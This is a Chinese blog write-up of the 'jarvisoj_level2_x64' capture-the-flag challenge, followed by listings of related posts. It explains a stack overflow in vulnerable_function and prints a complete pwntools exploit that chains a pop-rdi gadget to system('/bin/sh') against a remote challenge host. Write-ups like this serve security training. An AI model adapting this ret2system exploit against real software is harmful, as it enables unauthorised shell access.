jarvisoj_level2_x64

最新推荐文章于 2024-05-04 22:17:26 发布
最新推荐文章于 2024-05-04 22:17:26 发布
阅读量572 收藏
点赞数
分类专栏: buuctf 笔记 ctf 文章标签: c++ c# 网络安全 安全 大数据
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zip471642048/article/details/125448386
版权
笔记 同时被 3 个专栏收录
113 篇文章 5 订阅
订阅专栏
ctf
107 篇文章 4 订阅
订阅专栏
buuctf
39 篇文章 1 订阅
订阅专栏

jarvisoj_level2_x64

题目地址 : https://buuoj.cn/challenges#jarvisoj_level2_x64
在这里插入图片描述

checksec 一下,64位程序 开的保护影响不大(nx栈不可执行,也就是不能往栈上写shellcode)

在这里插入图片描述

main函数

主要是调用了vuln函数,其他没问题

在这里插入图片描述

vulnerable_function函数

首先这个函数调用了system函数,这就使得plt表中存在system,且可以被我们调用,然后read读取了0x200个字符串,这比buf到rbp的距离0x80还要大,这又使得我们可以对return
addr进行覆盖,再然后呢就是这个程序竟然存在/bin/sh字符串,我们可以通过system直接获得shell

在这里插入图片描述
/bin/sh字符串
在这里插入图片描述
exp

from pwn import *

io = process("./level2_x64")
io = remote("node4.buuoj.cn",28824)
elf = ELF("./level2_x64")

context(log_level="debug",arch="amd64",os="linux")
system_addr = elf.symbols["system"]
binsh_addr = next(elf.search("/bin/sh"))
main_addr = elf.symbols["main"]
rdi_ret_addr = 0x00000000004006b3
ret_addr = 0x00000000004004a1
payload = flat(["a"*0x80,"aaaabbbb",rdi_ret_addr,binsh_addr,ret_addr,system_addr])

io.sendlineafter("Input:",payload)
io.interactive()
[mzq]
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
(Jarvis Oj)(Pwn) level2(x64)
Nothing
04-19 1411
(Jarvis Oj)(Pwn) level2(x64) 首先用checksec查一下保护,和level2一样。 反汇编,程序和32位的程序几乎一致。找到溢出点。 那么溢出思路也和32位的差不多,唯一不同的是,64位程序在调用system函数时,参数的传递方式和32位不一样,32位是通过栈传参,而64位通过edi寄存器传参,所以这时我们的思路变成如何覆盖edi的值,通过基本rop就可...
【BUUCTF-PWN】13-jarvisoj_level2_x64
最新发布
燕麦葡萄干的博客
07-05 384
ret指令的地址,再接着是’/bin/sh’字符串的地址,最后是system()函数的地址。ret处,该指令会将当前栈顶的元素(‘/bin/sh’字符串的地址)出栈并存入rdi中,并返回到下一条指令处。此时栈中就只有system()函数的地址了,所以下一条指令正是system(),而它需要的参数正好就在rdi寄存器中,这样就执行了system(’/bin/sh’)现在只需要让函数返回到system,并传入参数“/bin/sh”就可以了。32位的比较简单,只需要返回地址+下一次的返回地址+参数1+参数2+…
jarvis oj level2_x64
发蝴蝶和大脑斧的博客
12-05 535
接下来做64位了,首先看下和32位有什么不一样。这篇文章的第3节说的很详细 主要来说就是: 1.内存地址的范围由32位变成了64位,但是可以使用的内存地址不能大于0x00007fffffffffff,否则会抛出异常。 2.x64中的前六个参数依次保存在RDI,RSI,RDX,RCX,R8和 R9中,如果还有更多的参数的话才会保存在栈上。我们要修改寄存器的值就得通过找到例如pop rdi;ret这样...
JarvisOJ level2x64
PLpa的博客
07-09 508
这题和level2的漏洞和处理方式差不多,只不过level2是x86而这题是x64的 前言: 首先,我们先看一下x64和x86的区别: linux_64与linux_86的区别主要有两点:首先是内存地址的范围由32位变成了64位。但是可以使用的内存地址不能大于0x00007fffffffffff,否则会抛出异常。其次是函数参数的传递方式发生了改变,x86中参数都是保存在栈上,但在x64中的前六个参...
uTinyRipper_x64 (2)_uTinyRipper_x64_
10-01
《uTinyRipper_x64:Unity资源提取利器详解》 在数字娱乐产业中,Unity引擎因其强大的功能和易用性,已经成为许多开发者首选的游戏开发工具。然而,有时我们可能需要从Unity游戏或应用程序中提取资源,如模型、纹理...
451687.zip_2 level inverter_model discrete
07-14
Level 2 SV modulation inverter discrete model, matlab6, 5 of simulink,
LRVOSUN.rar_level set_level set model
07-14
A new level set model without initialization, very time effi
level_set_image.rar_level set_level set 方程
09-21
这个"level_set_image.rar_level set_level set 方程"的压缩包内容可能包含了一个名为"level_set_image.m"的MATLAB程序,用于演示或实现Level Set方法在图像处理中的应用。 Level Set方法的核心在于用一个标量函数...
Level_Set.zip_level set_level-set_set
07-15
这个"Level Set.zip_level set_level-set_set"压缩包文件包含了一个名为"Level_Set.m"的MATLAB程序,用于执行Level Set算法。 Level Set方法的核心思想是将图像中的边界或形状表示为一个零水平集(level set)函数...
BUUCTF jarvisoj_level2_x64
小白垃圾笔记2
05-12 291
因为有栈对齐所以需要ret,因为是64位传参所以需要pop rdi。system函数的地址也可以看。小白做题笔记,不建议阅读。我们尝试找下bin/sh。函数直接调用漏洞函数。
jarvisoj——[XMAN]]level2(x64)
王嘟嘟的博客
07-19 366
题目 Wp 这里检查一下基础项 这里看了一下,发现还是read这里出现了问题,需要进行覆盖 构造一下payload from pwn import * r=process("./level2_x64") #r=remote('pwn2.jarvisoj.com',9882) e=ELF('./level2_x64') sys_addr=e.symbols['system'] bin_addr=e.search("/bin/sh").next() pop_rdi=0x4006b3 payload='
PWN_JarvisOJ_Level2_x64
michaelinfinity的博客
03-16 1426
关于level2我就不多做赘述了。这道题和level2之间的区别就是一个是32位的栈溢出,另一个就是64位的栈溢出。 32位的函数在调用栈的时候是: 调用函数地址->函数的返回地址->参数n->参数n-1....->参数1 64位的函数在调用栈的时候是: 前六个参数按照约定存储在寄存器:rdi,rsi,rdx,rcx,r8,r9中。 ...
buuctf|pwn-jarvisoj_level2_x64-wp
l2645470582_的博客
11-08 448
1.例行检查保护机制 只开启了堆保护 2.我们用64位的IDA查看该文件 shift+f12查看关键字符串,我们看到关键字符串“/bin/sh” 我们双击“/bin/sh”,bin/sh的地址为:0x0600A90 3.查看main函数里面的内容 进入vulnerable_function()函数 我们看到buf只有0x80个字节,但是下面read()里面读取了0x200个,这里造成了溢出 4.system("/bin/sh")才能拿到权限 我们找...
jarvisoj_level2_x64[BUUCTF]
moonlightsunshin的博客
05-04 337
32位中参数都是保存在栈上,但在64位中的前六个参数依次保存在RDI,RSI,RDX,RCX,R8和 R9中,如果还有更多的参数的话才会保存在栈上。read函数存在溢出同时发现有/bin/sh所以我们思路就是构造溢出到/bin/sh,但是由于是64位的程序在函数调用时与32位不同。由32位变成了64位。payload的组成 无用数据+pop rdi+函数参数+函数调用地址/bin/sh+函数返回地址system。回到这道题 64位会依次传函数返回地址,函数参数,函数调用地址,
jarvis oj---level2x64
weixin_45427676的博客
09-29 308
题目来源 nc pwn2.jarvisoj.com 9882 level2_x64.04d700633c6dc26afc6a1e7e9df8c94e 解题 x64和x86的区别: linux_64与linux_86的区别主要有两点:首先是内存地址的范围由32位变成了64位。但是可以使用的内存地址不能大于0x00007fffffffffff,否则会抛出异常。其次是函数参数的传递方式发生了改变,x86...
buuctf jarvisoj_level2_x64
carol2358的博客
04-22 393
水题 栈溢出,system和binsh都可以用gdb找到 exp: from pwn import * from LibcSearcher import * local_file = './level2_x64' local_libc = '/usr/lib/x86_64-linux-gnu/libc-2.29.so' remote_libc = './libc.so.6' s...
jarvisoj_level2
08-13
- *1* *3* [jarvisoj_level2_x64](https://blog.csdn.net/zip471642048/article/details/125448386)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值